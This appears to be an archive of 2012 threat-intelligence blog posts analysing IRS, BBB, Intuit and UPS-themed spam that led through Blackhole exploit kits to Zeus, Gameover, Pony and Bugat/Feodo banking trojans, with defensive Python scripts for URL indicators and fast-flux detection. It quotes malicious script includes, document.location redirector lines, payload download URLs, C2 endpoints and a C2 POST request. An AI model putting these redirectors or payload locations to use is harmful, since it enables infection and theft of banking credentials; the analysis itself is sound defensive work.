Tag Archives: IRS

Zeus v2.0.8.9 being rolled out on IRS themed spam

We analyzed the following malicious attachment, which was distributed with IRS themed spam on May 14 2012:

Name: Plexer_Order-z9284
MD5: e807511362923762da627599daeeba65
Size: 21,54,749 bytes
Content: Plexer_Order-z9284.exe

This zip archive contained the following malicious dropper:

Name: Plexer_Order-z9284.exe
MD5: 3c8b1a1c45fbb93e93dbde75795c21bd
Size: 21,84,348 bytes
Timestamp: 1970:01:01 01:00:49+01:00
Company Name: NEW ORDER 2012 FOR VIEW PLEXR
File Description: Win32 Cabinet Self-Extractor
File Version: 9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
Internal Name: Wextract
Legal Copyright: © Microsoft Corporation. All rights reserved.
Original Filename: WEXTRACT.EXE .MUI
Product Name: Plexer Order Viewer 2012
Product Version: 56.0.89.3
Comments: NEW VERSION ORDER 2012 FOR VIEW PLEXR
Website: http://www.avira.com
Packager: Xenocode Postbuild 2009 for .NET Beta
Packager Version: 7.0.162

This dropper first installs Google Talk on the system and brings the Google Talk window to the front of the desktop. Behind the scenes, it installs Zeus v2.0.8.9. Zeus was installed in %APPDATA%/[random]/emta.exe and had the following file properties:

Name: emta.exe
MD5: bbdeabff13e565e187e0e85fcb1e732f
Size: 95,744 bytes
Timestamp: 2011:07:27 04:06:30+02:00

Like a standard Zeus build, it first downloads a configuration file consisting of a target list and webinjects from:

hxxp://kmginsights.com/upload/LoadhandlerImages_/y/config.bin

The Zeus dropzone was also running on the same domain at:

hxxp://kmginsights.com/upload/LoadhandlerImages_/y/gate.php

This Zeus controller was running on the compromised website of KMG INSIGHTS, a firm that offers a complete line of marketing, technology and organizational consulting services.

Russian, Spanish, Italian and UK banks and financial institutions were among the targets of this Zeus controller.

IRS spams

We analyzed the following malicious URLs, which we believe were used in IRS spam:


Although 9x18.com was restricting access to these URLs, the other malicious URLs were up and serving their purpose of redirecting victims to a Blackhole exploit kit through the following 3 JavaScript includes:

<script type="text/javascript" src="hxxp://anydemo.in/ox8rWBHG/js.js"></script>
<script type="text/javascript" src="hxxp://Darsshan.com/8n9SXXoy/js.js"></script>
<script type="text/javascript" src="hxxp://www.moverpackermart.com/3F634op7/js.js"></script>

The Blackhole kit was running at hxxp://85.25.189.174/showthread.php?t=34c79594e8b8ac0f. It first drops a Pony downloader from the following location:

hxxp://85.25.189.174/q.php?f=2fcad&e=2
File: info.exe
MD5: 9b196853650fcb8ac182be05b627f07c
Size: 1,31,168 bytes

The Pony downloader posts to its dropzone at 91.121.84.204/pony/gate.php. It was also configured to download 3 identical Gameover Zeus payloads from the following locations:

1. hxxp://electrosa.com/8zvW2XE.exe
2. hxxp://arteyciencia.es/AUq5p7Sm/4VLks.exe
3. hxxp://hotelsatmatheran.com/0Pvo9Hnu/EpJbWNWD.exe
4. hxxp://poetesa.ro/0SbvQR5X/5op0.exe

Gameover was installed at %APPDATA%\Enze\izvuo.exe with the following properties:

MD5: 4105a615d658d89e836c125844be5f39
Size: 3,41,600 bytes
Timestamp: 2010:10:31 08:13:32+01:00
Payload Build Time: 2012-04-16 03:12:58

This Gameover Zeus variant posts to a dropzone at 86.124.117.250:16824. Webinjects were downloaded from 125.166.213.114:25137. The Gameover variant had a botid of "MF222a20" and a cid of "5555".

As we have noted here, the Pony downloader and Gameover Zeus payloads share the same file properties, suggesting that both were built by the same group, possibly around the same time:

Signature: Digitally signed by 'wU5sF34khy4k0DMt30RspNOOm'
Certificate Validity: 04/20/2012 to 01/01/2040
Company Name: Microsoft Corporation
File Description: Windows Disk Diagnostic User Resolver
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Internal Name: DFDWiz.exe
Legal Copyright: © Microsoft Corporation. All rights reserved.
Original Filename: DFDWiz.exe
Product Name: Microsoft® Windows® Operating System
Product Version: 6.1.7600.16385

IRS-Intuit-BBB themed spams -to- BlackHole -to- Gameover Zeus

Subject: IRS notification of your tax appeal status.
URL: hxxp://pedrasecompanhia.com.br/KdiK8scE/index.html

IRS notification of your tax appeal status

Subject: Rejection of your tax appeal.
URL: hxxp://entertain4you.com/iWYE2wes/index.html

Rejection of your tax appeal

Subject: Your tax return appeal is declined
URLs: hxxp://pedrasecompanhia.com.br/iWYE2wes/index.html

Your tax return appeal is declined

Subject: Your Intuit.com software order.
URLs: hxxp://panacea-retail.com/N192yy6H/index.html
hxxp://mondistar.ro/fUjtMi6v/index.html
hxxp://panacea-retail.com/N192yy6H/index.html

Your Intuit.com software order

Subject: Your intuit.com order.
URLs: hxxp://pinter.rsia-andini.com/KdiK8scE/index.html
hxxp://pinter.rsia-andini.com/Q8dvz6Dw/index.html
hxxp://mainfar.zxq.net/fUjtMi6v/index.html

Your intuit.com order

Subject: Re: your customers complaint ID 50606977.
URLs: hxxp://almeidadohrn.com/wp-includes/opek.html

Re: your customers complaint ID 50606977

Subject: Your company Better Business Bureau complaint.
URLs: hxxp://thearabmatch.com/8ViaUCMr/index.html
hxxp://mirsatmurutoglu.freehosting.com/TcS203Fn/index.html
hxxp://mondistar.ro/N192yy6H/index.html

Your company Better Business Bureau complaint

Subject: BBB processing RE: Case ID 33614330
URLs: hxxp://michael-ngo.com/wp-includes/opek.html

BBB processing RE: Case ID 33614330

Subject: BBB case ID 35908630
URLs: hxxp://womens-issues.medicalbillingclassesonline.info/wp-includes/opek.html

BBB case ID 35908630

Subject: Your business is accused of illegal activities.
URLs: hxxp://travianx10.host.org/FMG8bqfk/index.html
hxxp://southernmagnetics.com/FMG8bqfk/index.html
hxxp://pedrasecompanhia.com.br/h2gVqD1Q/index.html
hxxp://impresilk.com.br/8ViaUCMr/index.html

Your business is accused of illegal activities.

These JavaScript redirectors contain the following document.location script, which sends victims to a Blackhole Exploit kit at 207.210.65.102:

document.location='hxxp://173.224.71.132:8080/showthread.php?t=d44175c6da768b70';

It downloads the Gameover Zeus installer from the following location:

173.224.71.132:8080 /q.php?f=e0c3a&e=2

File: calc.exe
MD5: 0599eb89a5ca8ea3b7c887e3940d1a33
Size: 2,86,703 bytes

This Gameover variant is detected by 3 of 43 AV vendors on VirusTotal. It then installs Zeus in %APPDATA%, which had the following properties:

File: ycegv.exe
MD5: e34904d4dbd79ee5ac9148adc37534cb
Size: 2,73,944 bytes
Other: This file is digitally signed by 'aPgdobQNbLOM'
Company Name: Twain Working Group
File Description: Twain.dll Client’s 32-Bit Thunking Server
File Version: 1,7,0,0
Internal Name: Twunk_32
Original Filename: Twunk_32.exe
Product Name: Twain Thunker
Timestamp: 2011:07:23 16:34:06+02:00

This Gameover variant is detected by 7 of 43 AV vendors on VirusTotal.
The Gameover variant had a bot id of "ppcz14" and a cid of "3004", and posted online banking credentials stolen from victims to a drop zone at 87.97.164.223 over port 22005.

IRS themed spam continue dropping Gameover Zeus

Subject: IRS notification of your tax appeal status.
URL: hxxp://annebickmoreswimming.co[.]uk/SsXbaqXv/index.html

IRS notification of your tax appeal status

The text 'Online Tax Appeal' contains a hyperlink to the URL shown above. This page contains no content, only the following 5 JavaScript includes:

pancarga[.]com /a5861cqc/js.js
suhutgundem[.]com /VLj9KNR8/js.js
paypal.socialo[.]pl /q9QQjLxa/js.js
personalart[.]pl /93b7jQCc/js.js
m.slevako[.]cz /w4eyfSFP/js.js

These JavaScript redirectors contain the following document.location script, which sends victims to a Blackhole Exploit kit at 207.210.65.109:

document.location='hxxp://178.77.99[.]145:8080/showthread.php?t=d44175c6da768b70';

It downloads the Gameover Zeus installer from the following location:

178.77.99.145:8080 /q.php?f=e0c3a&e=2

File: info.exe
MD5: c4df59ee070a33e07bbff66c0d46b421
Size: 2,74,383 bytes

This Gameover variant is detected by 3 of 43 AV vendors on VirusTotal.com. It then installs Zeus in %APPDATA%, which had the following properties:

File: eluqf.exe
MD5: cc6d35de55dee429dc801535b8104caa
Size: 2,73,944 bytes
Other: This file is digitally signed by 'aPgdobQNbLOM'
Company Name: qwetr Corporation
File Description: qwetr Magnifier
File Version: 5.00.2151.1
Internal Name: MAGNIFIER
Legal Copyright: Copyright (C) qwetr Corp. 1981-1999
Original Filename: MAGNIFY.EXE
Product Name: qwetr(R) Windows (R) 2000 Operating System
Timestamp: 2011:02:03 19:50:12+01:00

This Gameover variant is detected by 4 of 43 AV vendors on VirusTotal.com.
The Gameover variant had a bot id of "ppcz13" and a cid of "3004", and posted online banking credentials stolen from victims to a drop zone at 87.97.164.223 over port 22005.

IRS – Your tax appeal is rejected.

Subject: Your tax appeal is rejected.
URL: hxxp://morningdeals[.]net/ZseUkSLa/index.html

Your tax appeal is rejected.

The text 'Online Tax Appeal' contains a hyperlink to the URL shown above. This page contains no content, only the following 4 JavaScript includes:

badigames[.]net /YRQnqzee/js.js
hermandaddepasion[.]com /63x21NoX/js.js
http://www.techhome.rmutk.ac[.]th /8vVWAm9s/js.js
http://www.trakter4u[.]gr /dLYd6p1U/js.js

These JavaScript redirectors contain the following document.location script, which sends victims to a Blackhole Exploit kit at 207.210.65.109:

document.location='hxxp://tradercircuit[.]com/showthread.php?t=73a07bcb51f4be71';

It first downloaded a Pony downloader from the following location:

tradercircuit[.]com /q.php?f=e4a98&e=2

File: info.exe
MD5: 623d391863770fd11a51f564a655cfc0
Size: 95,392 bytes

This Pony downloader variant was also configured to download Gameover Zeus binaries from the following locations:

layout.cnt[.]br /3ZD7ArbR/rnzj80FK.exe —> hosted at IP address 187.45.216.36
kucukagaanaokulu.k12[.]tr /5hxYiCGM/DLsp9.exe —> hosted at IP address 94.102.1.94
beyondcreativehm[.]com /MnFUS9Ah/PVzKLHf.exe —> hosted at IP address 69.89.31.99

All of these files were identical, with the following properties:

File: rnzj80FK.exe/DLsp9.exe/PVzKLHf.exe
MD5: 4bf9cca55ff576e91c1fd4a2c2d35ff1
Size: 2,78,528 bytes
Other: This file is digitally signed by '66666666'
Company Name: 2q3wet Corporation
File Description: Windows TaskManager
Internal Name: taskmgr
Legal Copyright: Copyright (C) 2q3wet Corp. 1991-1999
Original Filename: taskmgr.exe

This Gameover variant is detected by 4 of 43 AV vendors on VirusTotal.com. The Gameover Zeus variant posts to a dropzone at 78.229.28.1 over port 28598. It had a CID of "3004".

Triple Barrel Spam Cannon

wall of spam

Our spammer friends started their week with an early morning spam run. We observed three different spam campaigns in action today that all utilized the same infrastructure and dropped the same Bugat/Feodo banking trojan.

The bad guys used the same modus operandi that they've come to rely on. Their spam messages contained links to hacked websites, primarily WordPress blogs. These hacked sites hosted malicious JavaScript that redirected victims to an exploit kit that dropped a Bugat/Feodo payload.

The different campaigns were easily identifiable via the URL paths used on the hacked websites.

  • IRS-themed spam had a URL path of /fgallery/rep.html or just /rep.html. Check out a Wepawet report from an IRS-spam sample here.
  • AICPA-themed spam had a URL path of /fgallery/astro.html or just /astro.html. Check out a Wepawet report from an AICPA-spam sample here.
  • BBB-themed spam had a URL path of /fgallery/brena.html or just /brena.html. Check out a Wepawet report from a BBB-spam sample here.

All of the observed samples redirected victims to an exploit kit at hxxp://110hobart[.]com.

The 110hobart[.]com domain currently resolves to 76.12.101.172. While this domain only points to 1 IP address, the A record has a TTL of 900 seconds, indicating that it is hosted on a fast-flux infrastructure. This is consistent with the other exploit kits used in associated spam campaigns. Further investigation of the 110hobart[.]com domain shows that it has 4 NS records, including:

  • ns1.hiring-decisions.com
  • ns2.hiring-decisions.com
  • ns1.grapecomputers.net
  • ns2.grapecomputers.net

Our guess is that these nameservers are serving other malicious domains. We can use the "swiss army knife" over at Robtex to validate our assumption. Indeed, Robtex proves our intuition correct and shows that the following other domains also utilized these nameservers:

  • energirans[.]net
  • hapturing[.]net
  • housespect[.]net
  • synergyledlighting[.]net
  • synetworks[.]net

Have we seen any of these domains before? We sure have! The domain energirans.net hosted an exploit kit used in a previous AICPA spam run documented here. Jsunpack tells us that hapturing[.]net is also bad. Conrad over at Dynamoo's Blog notes that housespect[.]net and synetworks[.]net are bad as well. And yes, you guessed it, synergyledlighting[.]net also stinks; Wepawet tells us more here.

In the case of the IRS, AICPA, and BBB spam runs seen today all of them ultimately instructed victims to download a Bugat/Feodo banking trojan from hxxp://110hobart[.]com/w.php?f=cc677&e=1. This payload had an MD5 of 2dbe5c4303672f256886ed27c92e97be and was detected by 9 of 43 AV vendors on VirusTotal.

This Bugat/Feodo sample retrieved a configuration file/target list from a command and control server at hjpyvexsutdctjol[.]ru:8080 via the following POST request:

POST /rwx/B2_9w3/in/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: hjpyvexsutdctjol[.]ru:8080
Content-Length: 97
Connection: Keep-Alive
Cache-Control: no-cache

We haven't yet examined the configuration file/target list in detail, but we're confident that it targets the same 300+ financial institutions that we've seen in previous Bugat/Feodo configs.

United Postal Service Tracking Number H7614058739

Most of the spam cannons that we follow go quiet on the weekends, so let's take a look at a sample that we picked up on Friday 2012-02-24. This spam spoofed communications from UPS.

We noted that at least one spam sample from this UPS campaign was sent from a bot at 171.229.226.63. This particular IP is part of a known Grum spambot.

Attached to this sample was a file named "UPS-NR954wi27683.htm". This HTML file contained malicious JavaScript that redirected victims to a Blackhole Exploit kit at cgoosjjdopola[.]ru. This kit probed victims for a series of potential vulnerabilities, downloading malicious .swf, .pdf, and .jar files.

Vulnerable computers were then instructed to download a Bugat/Feodo banking trojan from sumgankorobanns[.]ru via a GET request to sumgankorobanns[.]ru:8080/images/jw.php?i=10. The downloaded Bugat/Feodo payload had the following properties:

File: gsxohsapcpklkti.exe
Size: 73216
MD5: c6d7b68ee00085702f7f6aafb03ca559

Both cgoosjjdopola[.]ru and sumgankorobanns[.]ru were hosted on the same fast-flux botnet we observed in our previous post "Rejection of your tax appeal". These domains resolved to the following IP addresses (a number of which were observed in our previous post):


We had a little time on our hands today, so we decided to poke around the Blackhole kit at sumgankorobanns[.]ru and see if it hosted any other goodies. We found that this kit hosted the same Bugat/Feodo payload (c6d7b68ee00085702f7f6aafb03ca559) between jw.php?i=1 and jw.php?i=18.

This Bugat/Feodo variant first attempts to connect to a command and control server at hjpyvexsutdctjol[.]ru. During testing this control server returned a "500 Internal Server Error". The variant then connects to a secondary control server at wfyusepaxvulfdtn[.]ru via a POST request to wfyusepaxvulfdtn[.]ru:8080/rwx/B1_3n9/in/. This POST request returned a configuration file. The configuration file instructed the Bugat/Feodo variant to hijack account credentials for approximately 300 banking websites.

If the /rwx/B1_3n9/in/ path looks familiar to you it should. Recall our previous post “Rejection of your tax appeal” where we saw a different Bugat/Feodo variant pull down its configuration file from hjpyvexsutdctjol[.]ru:8080/rwx/B2_9w3/in/.

Hrm, the Bugat/Feodo variant dropped by the UPS spam also tried to connect to the control server at hjpyvexsutdctjol[.]ru. However, the UPS Bugat/Feodo variant was configured to download its configuration file from /rwx/B1_3n9/in/ instead of /rwx/B2_9w3/in/. Perhaps the /B1 and /B2 path variations are used by the bad guys to track different spam and malware distribution campaigns.

The current control server at wfyusepaxvulfdtn[.]ru also dropped an additional bit of love. Appended to the configuration file downloaded from wfyusepaxvulfdtn[.]ru:8080/rwx/B1_3n9/in/ was a secondary malware payload identified as Heap. This Heap variant had the following properties:

File: POS1B.tmp
Size: 118272
MD5: 64BE90378FC40117EA93DFB8FA5AEC92

This Heap variant scans the victim machine for email addresses. These email addresses are harvested and then sent to a control server 46.137.122.154 over port 20050. Communications from the Heap variant to the control server at 46.137.122.154 were encoded with a standard base64 alphabet.

If you want to know whether you're infected by Bugat/Feodo, you can do the following simple checks on your local machine. First, Bugat/Feodo is almost always installed in the following location on your filesystem: C:\Documents and Settings\Administrator\Application Data\. Bugat/Feodo is installed as KB********.exe, where ******** is a series of 8 random digits unique to each victim computer. Additionally, the downloaded configuration file is stored in the clear in the victim's registry at HKEY_CURRENT_USER\Software\Microsoft\Windows Media Center\********. If you find either of these artifacts on your machine, you're probably infected.

What can brown do for you, you ask? Well, in this case it can infect you with a Bugat/Feodo banking trojan and a Heap email harvester.

Warning from IRS

We’re going to file the following example under “even spammers make mistakes”.

The above spam message spoofing communications from the IRS was received yesterday on 2012-02-23. It was sent from a bot with the IP 62.129.255.5.

The otherwise well-crafted spam had one crucial mistake. It contained a link to hxxp://dll-aghazeh[.]com/YzrYt31J/index.html. Unfortunately for the bad guys, this page returned a '404 Page Not Found' error instead of the expected malicious JavaScript.

While it's unclear why this page did not contain any malicious code, we can safely assume that it was supposed to contain JavaScript redirectors that would have pointed victims to a Blackhole Exploit kit. That exploit kit would have almost certainly dropped a Pony downloader on its victims.

How can we make this assumption? Well, it's simple. Note the structure of the above malicious link: hxxp://dll-aghazeh[.]com/YzrYt31J/index.html. Notice the random 8-character folder name in the URL path? We've seen that pattern before. A quick review of the previous posts Better Business Bureau complaint and Notification of securities investigation against your company reveals that this random 8-character folder pattern was used in previous spam campaigns that also dropped a Pony downloader variant. So, this random folder name pattern appears to be an indicator of malicious behavior.

As you're trawling through your inbox and you see suspicious-looking emails with text goading you to click on a link, hover your mouse over the link and study the destination URL without clicking it. If you see this random 8-character folder pattern, it's a good idea to delete the email and carry on with your day.
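The random 8-character folder name described above, together with the other URL shapes documented in these posts (js.js redirectors, Blackhole showthread.php/main.php landing pages, q.php/w.php payload handlers and the /fgallery/*.html campaign markers from the Triple Barrel post), can be turned into a small triage filter for links pulled out of a mail queue. This is an added example, not code from the blog; the labels, the "looks random" heuristic and the sample URLs are our own choices, and the defanged forms (hxxp, [.], "host /path") are normalised before matching.

```python
import re
from urllib.parse import urlsplit, parse_qs

# URL shapes documented in the posts above. Each entry: (label, path regex with an
# optional capture group for the random token, query keys to inspect, value regex).
INDICATORS = [
    # hacked-site landing pages: /<8 random alphanumerics>/index.html
    ("landing-page", re.compile(r"^/([A-Za-z0-9]{8})/index\.html$"), (), None),
    # js.js redirectors injected into other hacked sites
    ("js-redirector", re.compile(r"^/([A-Za-z0-9]{8})/js\.js$"), (), None),
    # Gameover / Pony downloads: /<8 random alphanumerics>/<name>.exe
    ("payload-exe", re.compile(r"^/([A-Za-z0-9]{8})/[A-Za-z0-9]+\.exe$"), (), None),
    # campaign marker pages from the Bugat/Feodo runs
    ("campaign-page",
     re.compile(r"^(?:(?:.*/fgallery)?/(?:rep|astro|brena|ir)\.html|/wp-includes/opek\.html)$"),
     (), None),
    # Blackhole landing pages: showthread.php?t=<16 hex> or main.php?page=<16 hex>
    ("blackhole-landing", re.compile(r"^/(?:showthread|main)\.php$"),
     ("t", "page"), re.compile(r"^[0-9a-f]{16}$")),
    # Blackhole payload handlers: q.php / w.php ?f=<5 hex>&e=<n>
    ("blackhole-download", re.compile(r"^/[qw]\.php$"),
     ("f",), re.compile(r"^[0-9a-f]{5}$")),
]

def looks_random(token):
    """Crude randomness check: 8 chars drawn from at least two of lower/upper/digit.
    This keeps ordinary 8-letter folders such as /products/ from matching."""
    classes = sum(bool(re.search(p, token)) for p in (r"[a-z]", r"[A-Z]", r"[0-9]"))
    return len(token) == 8 and classes >= 2

def refang(url):
    """Normalise the defanged forms used in these posts (hxxp, [.], 'host /path')."""
    url = url.strip().replace("[.]", ".").replace(" /", "/")
    if url.startswith("hxxp"):
        url = "http" + url[4:]
    if "://" not in url:
        url = "http://" + url
    return url

def classify_url(url):
    """Return the labels of every indicator pattern the URL matches (empty = no match)."""
    parts = urlsplit(refang(url))
    query = parse_qs(parts.query)
    hits = []
    for label, path_re, keys, value_re in INDICATORS:
        m = path_re.match(parts.path)
        if not m:
            continue
        if m.groups() and not looks_random(m.group(1)):
            continue
        if keys:
            values = [query[k][0] for k in keys if k in query]
            if not values or not value_re.match(values[0]):
                continue
        hits.append(label)
    return hits

def triage(urls):
    """Map each URL to its indicator labels, e.g. over links extracted from a mail queue."""
    return {u: classify_url(u) for u in urls}

if __name__ == "__main__":
    # Constructed sample: links quoted in the posts above plus one benign URL.
    sample = [
        "hxxp://dll-aghazeh[.]com/YzrYt31J/index.html",
        "hxxp://anydemo.in/ox8rWBHG/js.js",
        "173.224.71.132:8080 /q.php?f=e0c3a&e=2",
        "hxxp://energirans[.]net/main.php?page=710730c6e154dae7",
        "hxxp://knlu[.]info/wp-content/uploads/fgallery/ir.html",
        "http://www.example.com/products/index.html",
    ]
    for url, labels in triage(sample).items():
        print(f"{url:60} {labels or 'clean'}")
```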

Rejection of your tax appeal

In today’s episode we’ll take a closer look at an IRS-themed spam sample seen floating around the internets on 2011-02-23.

This sample had a link to hxxp://knlu[.]info/wp-content/uploads/fgallery/ir.html. A number of other IRS-themed samples also contained links to what appear to be hacked WordPress blogs. These blogs all contained "/fgallery/ir.html" in the URI path.

With a little bit of google-fu we can uncover other hacked WordPress sites via a simple "inurl:/fgallery/ir.html" search.

The page pulled from the received spam sample, hxxp://knlu[.]info/wp-content/uploads/fgallery/ir.html, contains malicious javascript that redirects victims to hxxp://energirans[.]net/main.php?page=710730c6e154dae7 – a Blackhole exploit kit.

Vulnerable victims then download a malicious binary from energirans[.]net/w.php?f=3dc5c&e=4. This binary has been identified as a Bugat/Feodo banking trojan and has the following properties:

File: about.exe
Size: 63488
MD5: 85DC077D5E50B7E133FEF85E09DFE2FB

Unfortunately, this Bugat/Feodo variant is only detected by 2 of 43 AV vendors on VirusTotal.

A closer look at energirans[.]net reveals that it is hosted on a fast-flux infrastructure. Via centralops we can see that the energirans[.]net domain resolves to only one IP, 115.249.190.46. However, the A record for energirans[.]net has a TTL (time to live) of 15 minutes. This means the DNS mapping for energirans[.]net will only stay cached for 15 minutes. A TTL this short is a strong indicator that the domain in question is hosted on a fast-flux infrastructure. Spamhaus has a good explanation of fast-flux here.

The dropped Bugat/Feodo variant implants itself on the victim machine and then connects to a command and control server at hjpyvexsutdctjol[.]ru where it downloads a configuration file from hjpyvexsutdctjol[.]ru:8080/rwx/B2_9w3/in/. This configuration file instructs the installed Bugat/Feodo variant to hijack account credentials from the listed banking websites. A quick look through this configuration file shows that it targets approximately 300 websites.

The hjpyvexsutdctjol[.]ru domain is also hosted on a fast-flux infrastructure that utilizes at least the following IPs:


The fast-flux infrastructure hosting hjpyvexsutdctjol[.]ru appears to be different from the infrastructure hosting the Blackhole exploit kit at energirans[.]net. Note the TTL for hjpyvexsutdctjol[.]ru is 60 seconds, much shorter than the 900 seconds for the energirans[.]net domain.
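The fast-flux reasoning used here and in the Triple Barrel and UPS posts (short A-record TTL, many unrelated addresses behind one name) can be scripted over passive-DNS observations. The code below is an added example rather than anything from the blog: the observations are constructed from the TTLs and addresses reported in these posts plus an invented control domain, and the thresholds (900 s TTL, 3 addresses, 3 distinct /16 networks) are our assumptions.

```python
from collections import defaultdict
from dataclasses import dataclass
import ipaddress

@dataclass(frozen=True)
class Observation:
    """One A-record answer recorded by a passive-DNS sensor (constructed sample data)."""
    domain: str
    ip: str
    ttl: int

# Constructed observation set. The C2 domain's addresses and 60 s TTL and the
# exploit-kit domain's single address and 900 s TTL are the values reported above;
# corp-mail.example is an invented control with a stable, long-lived answer.
SAMPLE = [
    Observation("hjpyvexsutdctjol.ru", "83.170.91.152", 60),
    Observation("hjpyvexsutdctjol.ru", "85.214.204.32", 60),
    Observation("hjpyvexsutdctjol.ru", "94.20.30.91", 60),
    Observation("hjpyvexsutdctjol.ru", "96.125.168.172", 60),
    Observation("hjpyvexsutdctjol.ru", "98.103.133.13", 60),
    Observation("hjpyvexsutdctjol.ru", "124.124.212.172", 60),
    Observation("energirans.net", "115.249.190.46", 900),
    Observation("corp-mail.example", "203.0.113.10", 3600),
    Observation("corp-mail.example", "203.0.113.11", 3600),
]

def flux_report(observations, short_ttl=900, min_ips=3, min_prefixes=3):
    """Per-domain fast-flux assessment over accumulated observations.

    'high'   : short TTL plus many addresses spread over many /16 networks,
               the classic fast-flux picture.
    'medium' : short TTL only; worth watching, but CDNs also use short TTLs,
               so a single snapshot with one address is not conclusive.
    'low'    : nothing unusual.
    """
    by_domain = defaultdict(list)
    for obs in observations:
        by_domain[obs.domain].append(obs)
    report = {}
    for domain, obs in by_domain.items():
        ips = {o.ip for o in obs}
        # Count distinct /16 networks: fast-flux nodes are compromised machines
        # scattered across unrelated networks, unlike a hosting provider's own ranges.
        prefixes = {str(ipaddress.ip_network(f"{ip}/16", strict=False)) for ip in ips}
        min_ttl = min(o.ttl for o in obs)
        short = min_ttl <= short_ttl
        dispersed = len(ips) >= min_ips and len(prefixes) >= min_prefixes
        level = "high" if short and dispersed else "medium" if short else "low"
        report[domain] = {
            "min_ttl": min_ttl,
            "distinct_ips": len(ips),
            "distinct_prefixes": len(prefixes),
            "level": level,
        }
    return report

if __name__ == "__main__":
    for domain, r in flux_report(SAMPLE).items():
        print(f"{domain:24} ttl={r['min_ttl']:5} ips={r['distinct_ips']:2} "
              f"/16s={r['distinct_prefixes']:2} -> {r['level']}")
```

Feeding the report a longer capture window (hours of lookups rather than one) is what moves a domain like energirans.net from "medium" to "high" once its rotating addresses have been seen.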